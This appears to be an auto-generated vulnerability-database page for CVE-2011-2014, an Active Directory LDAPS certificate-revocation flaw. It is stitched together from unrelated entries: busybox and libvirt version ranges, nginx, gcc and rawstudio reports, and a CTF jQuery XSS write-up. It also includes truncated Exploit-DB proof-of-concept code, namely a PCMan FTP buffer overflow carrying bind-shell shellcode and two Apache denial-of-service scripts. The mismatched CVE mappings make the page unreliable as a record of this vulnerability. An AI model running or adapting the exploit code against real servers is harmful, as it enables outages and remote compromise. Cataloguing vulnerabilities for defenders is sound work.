CVE-2011-2014
Published 2011-11-08
CVE-2011-2014: The LDAP over SSL (aka LDAPS) implementation in Active Directory, Active Directory Application Mode (ADAM), and Active Directory Lightweight Directory Service…
Priority: P3 · 47 · CVSS 2.0: 9 (critical)
CVSS 2.0 vector: AV:N/AC:L/Au:S/C:C/I:C/A:C
EPSS: 10.96% (95.3rd percentile)
The LDAP over SSL (aka LDAPS) implementation in Active Directory, Active Directory Application Mode (ADAM), and Active Directory Lightweight Directory Service (AD LDS) in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not examine Certificate Revocation Lists (CRLs), which allows remote authenticated users to bypass intended certificate restrictions and access Active Directory resources by leveraging a revoked X.509 certificate for a domain account, aka "LDAPS Authentication Bypass Vulnerability."
Affected (5 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| busybox | busybox | >= 0 < 1:1.21.0-1ubuntu1.4 | 1:1.21.0-1ubuntu1.4 |
| busybox | busybox | >= 0 < 1:1.22.0-15ubuntu1.4 | 1:1.22.0-15ubuntu1.4 |
| busybox | busybox | >= 0 < 1:1.27.2-2ubuntu3.2 | 1:1.27.2-2ubuntu3.2 |
| microsoft | windows_server_2008 | — | — |
| redhat | libvirt | >= 0 < 1.2.2-0ubuntu13.1.16 | 1.2.2-0ubuntu13.1.16 |
CVSS provenance

| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 2.0 | 9.0 | CRITICAL | AV:N/AC:L/Au:S/C:C/I:C/A:C |
| osv | — | 7.5 | HIGH | — |
| vendor_redhat | — | 6.8 | MEDIUM | — |
GHSA
GHSA-qm9j-69fp-v8p4 · ghsa_unreviewed · 2022-05-13 · CVE-2011-2014 [HIGH] · CWE-287
OSV
busybox vulnerabilities (CVE-2011-5325) · osv · 2019-04-03 · CVSS 7.5
Tyler Hicks discovered that BusyBox incorrectly handled symlinks inside tar archives. If a user or automated system were tricked into processing a specially crafted tar archive, a remote attacker could overwrite arbitrary files outside of the current directory. This issue only affected Ubuntu 14.04 LTS and Ubuntu 16.04 LTS. (CVE-2011-5325)

Mathias Krause discovered that BusyBox incorrectly handled kernel module loading restrictions. A local attacker could possibly use this issue to bypass intended restrictions. This issue only affected Ubuntu 14.04 LTS. (CVE-2014-9645)

It was discovered that BusyBox incorrectly handled certain ZIP archives. If a user or automated system were tricked into processing a specially crafted ZIP archive, a remote attacker could cause Bu
OSV
libvirt vulnerabilities (CVE-2011-4600) · osv · 2016-01-12 · CVSS 5.9
It was discovered that libvirt incorrectly handled the firewall rules on bridge networks when the daemon was restarted. This could result in an unintended firewall configuration. This issue only applied to Ubuntu 12.04 LTS. (CVE-2011-4600)

Peter Krempa discovered that libvirt incorrectly handled locking when certain ACL checks failed. A local attacker could use this issue to cause libvirt to stop responding, resulting in a denial of service. This issue only applied to Ubuntu 14.04 LTS. (CVE-2014-8136)

Luyao Huang discovered that libvirt incorrectly handled VNC passwords in snapshot and image files. A remote authenticated user could use this issue to possibly obtain VNC passwords. This issue only affected Ubuntu 14.04 LTS. (CVE-2015-0236)

Han Han discovered that
Red Hat
nginx: SMTP STARTTLS plaintext injection flaw (CVE-2014-3556) · vendor_redhat · 2014-08-05 · CVSS 6.8 [MEDIUM]
The STARTTLS implementation in mail/ngx_mail_smtp_handler.c in the SMTP proxy in nginx 1.5.x and 1.6.x before 1.6.1 and 1.7.x before 1.7.4 does not properly restrict I/O buffering, which allows man-in-the-middle attackers to insert commands into encrypted SMTP sessions by sending a cleartext command that is processed after TLS is in place, related to a "plaintext command injection" attack, a similar issue to CVE-2011-0411.
Statement: This issue did not affect the versions of nginx as shipped with Red Hat Software Collections 1 for Red Hat Enterprise Linux 6 and 7.
Package: nginx14-nginx (Red Hat Software Collections) - Not affected
Package: nginx16-nginx (Red Hat Software Collections) - Affected
No detection rules found.
Exploit-DB
Ubisoft Rayman Legends 1.2.103716 - Remote Stack Buffer Overflow (PoC) (CVE-2014-4334) · exploitdb · 2014-06-18
---
```perl
#!/usr/bin/perl
#
#
# Ubisoft Rayman Legends v1.2.103716 Remote Stack Buffer Overflow Vulnerability
#
#
# Vendor: Ubisoft Entertainment S.A.
# Product web page: http://www.ubi.com
# Affected version: 1.2.103716, 1.1.100477 and 1.0.95278
#
# Summary: Rayman Legends is a 2013 platform game developed by Ubisoft
# Montpellier and published by Ubisoft. It is the fifth main title in
# the Rayman series and the direct sequel to the 2011 game Rayman Origins.
# The game was released for Microsoft Windows, Xbox 360, PlayStation 3,
# Wii U, and PlayStation Vita platforms in August and September 2013.
# PlayStation 4 and Xbox One versions were released in February 2014.
#
# Desc: The vulnerability is caused due to a memset()
```
Exploit-DB
PCMan FTP Server 2.07 - 'ABOR' Remote Buffer Overflow (CVE-2013-4730) · exploitdb · 2014-01-29
---
```python
# Exploit Title: PCMAN FTP 2.07 ABOR Command Buffer Overflow
# Date: Jan 25,2014
# Exploit Author: Mahmod Mahajna (Mahy)
# Version: 2.07
# Tested on: Windows 7 sp1 x64 (english)
# Email: [email protected]
import socket as s
from sys import argv
#
if(len(argv) != 4):
    print "USAGE: %s host " % argv[0]
    exit(1)
else:
    #store command line arguments
    script,host,fuser,fpass=argv
    #vars
    junk = '\x41' * 2011 #overwrite function (ABOR) with garbage/junk chars
    espaddress = '\x59\x06\xbb\x76' # 76BB0659
    nops = '\x90' * 10
    shellcode = ( # BIND SHELL | PORT 4444
    "\x31\xc9\xdb\xcd\xbb\xb3\x93\x96\x9d\xb1\x56\xd9\x74\x24\xf4"
    "\x5a\x31\x5a\x17\x83\xea\xfc\x03\x5a\x13\x51\x66\x6a\x75\x1c"
    "\x89\x93\x86\x7e\x03\x76\xb7\xac\x77\xf2\xea\x60\xf3\x56\x
```
Exploit-DB
Apache - Denial of Service (CVE-2014-5329) · exploitdb · 2011-12-09 · CVSS 7.8 [HIGH]
---
```c
/*
 * This is a reverse engineered version of the exploit for CVE-2011-3192 made
 * by ev1lut10n (http://jayakonstruksi.com/backupintsec/rapache.tgz).
 * Copyright 2011 Ramon de C Valle
 *
 * Compile with the following command:
 * gcc -Wall -pthread -o rcvalle-rapache rcvalle-rapache.c
 */
#include
#include
#include
#include
#include
#include
#include
#include
#include
void ptrace_trap(void) __attribute__ ((constructor));
void
ptrace_trap(void) {
if (ptrace(PTRACE_TRACEME, 0, 0, 0) argv_string);
j = 0;
while (j != 10) {
struct addrinfo hints;
struct addrinfo *result, *rp;
int sfd, s;
ssize_t nwritten;
memset(&hints, 0, sizeof(struct addrinfo));
hints.ai_family = AF_UNSPEC;
hints.ai_socktype = SOCK_STREAM;
hints.ai_flags = 0;
hints.ai_protocol = 0;
s = getadd
```
Exploit-DB
Apache - Remote Memory Exhaustion (Denial of Service) (CVE-2014-5329) · exploitdb · 2011-08-19
---
```perl
#Apache httpd Remote Denial of Service (memory exhaustion)
#By Kingcope
#Year 2011
#
# Will result in swapping memory to filesystem on the remote side
# plus killing of processes when running out of swap space.
# Remote System becomes unstable.
#
use IO::Socket;
use Parallel::ForkManager;
sub usage {
print "Apache Remote Denial of Service (memory exhaustion)\n";
print "by Kingcope\n";
print "usage: perl killapache.pl [numforks]\n";
print "example: perl killapache.pl www.example.com 50\n";
}
sub killapache {
print "ATTACKING $ARGV[0] [using $numforks forks]\n";
$pm = new Parallel::ForkManager($numforks);
$|=1;
srand(time());
$p = "";
for ($k=0;$kstart and next;
$x = "";
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
P
```
Bugzilla
gcc: resource consumption issue in libstdc++ C++ regex library · bugzilla · 2014-08-05 · [LOW]
Maksymilian Arciemowicz reported a resource consumption issue in the libstdc++ C++ regex library. If an attacker were able to make an application using this library process a specially-crafted regular expression, it could cause the application to consume excessive system resources.
Original report: http://seclists.org/fulldisclosure/2014/Aug/1
Upstream bug: https://gcc.gnu.org/bugzilla/show_bug.cgi?id=61601
Currently on Fedora, this requires compiling the affected program with the experimental ISO C++ 2011 support by using the "-std=c++11" option.
Discussion:
Created gcc tracking bugs for this issue:
Affects: fedora-all [bug 1126692]
---
CVE request: http://www.openwall.com/lists/oss-security/2014/08/05/4
---
The u
Bugzilla
gcc: memory corruption issues in libstdc++ C++ regex library · bugzilla · 2014-08-05 · [MEDIUM]
Maksymilian Arciemowicz reported memory corruption issues in the libstdc++ C++ regex library. If an attacker were able to make an application using this library process a specially-crafted regular expression, it could cause the application to crash or, potentially, execute arbitrary code.
Original report: http://seclists.org/fulldisclosure/2014/Aug/1
Upstream bug: https://gcc.gnu.org/bugzilla/show_bug.cgi?id=61582
Currently on Fedora, this requires compiling the affected program with the experimental ISO C++ 2011 support by using the "-std=c++11" option.
Discussion:
Created gcc tracking bugs for this issue:
Affects: fedora-all [bug 1126692]
---
CVE request: http://www.openwall.com/lists/oss-security/2014/08/05/4
---
Bugzilla
CVE-2014-4978 rawstudio: Insecure use of temporary file · bugzilla · 2014-07-16 · CVSS 5.5 [MEDIUM]
The following was reported:
...
The function "rs_filter_graph" located in file ./librawstudio/rs-filter.c contains the following code:
```c
g_string_append_printf(str, "}\n");
g_file_set_contents("/tmp/rs-filter-graph", str->str, str->len, NULL);
ignore = system("dot -Tpng >/tmp/rs-filter-graph.png
```
CVE request: http://seclists.org/oss-sec/2014/q3/160
MITRE assigned CVE-2014-4978 to this issue.
---
Upstream seems dead, last commit is in February; maybe it's time to retire the package.
---
This is upstream - not dead :)
Please note that this function cannot be called by end users without modifying Rawstudio source. We disabled it in March 2011.
Fix is here for future reference:
https://github.com/rawstudio/rawstudio/commit/9c2cd3
Bugzilla
CVE-2014-0104 fence-agents: no verification of remote SSL certificates · bugzilla · 2014-02-28 · CVSS 5.9 [MEDIUM]
Michael Samuel reported that fence-agents does not verify remote SSL certificates in the fence_cisco_ucs.py script. This could potentially allow for man-in-the-middle attackers to spoof SSL servers via arbitrary, yet valid, SSL certificates.
This script did verify the validity of SSL certificates by default, but this behaviour was changed due to bug #691392, which introduced this behaviour via RHBA-2011:0834 [1].
* The fence_cisco_ucs script no longer checks the validity of SSL certificates by default. (BZ#691392)
Also note that this behaviour appears in the fence_rhevm.py script as well.
[1] http://rhn.redhat.com/errata/RHBA-2011-0834.html
Discussion:
Michael suggested the following as a potential idea of how t
CTF
hashes / README (CVE-2011-4969) · ctf_writeups · 2014 · CVSS 4.3 [MEDIUM]
# CSAW CTF 2014: hashes
**Category:** Web
**Points:** 300
**Description:**
> location, location, location
>
> Chal is very very stable. If you were scanning the site while I was doing dev work your requests are probably being dropped.
>
> Written by ColdHeat
## Write-up
The linked page uses an old version of the jQuery library (v1.6.1), [which enables an XSS vulnerability when e.g. `$('#' + userContent)` is called](http://bugs.jquery.com/ticket/9521) ([CVE-2011-4969](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-4969)). The page also contains this script:
```js
$(window).bind( 'hashchange', function(e) {
$('.image').hide()
tag = window.location.hash
$(tag).show()
});
tag = window.location.hash
$(tag).show()
```
This makes it possible to inject arbitrary JavaScript sim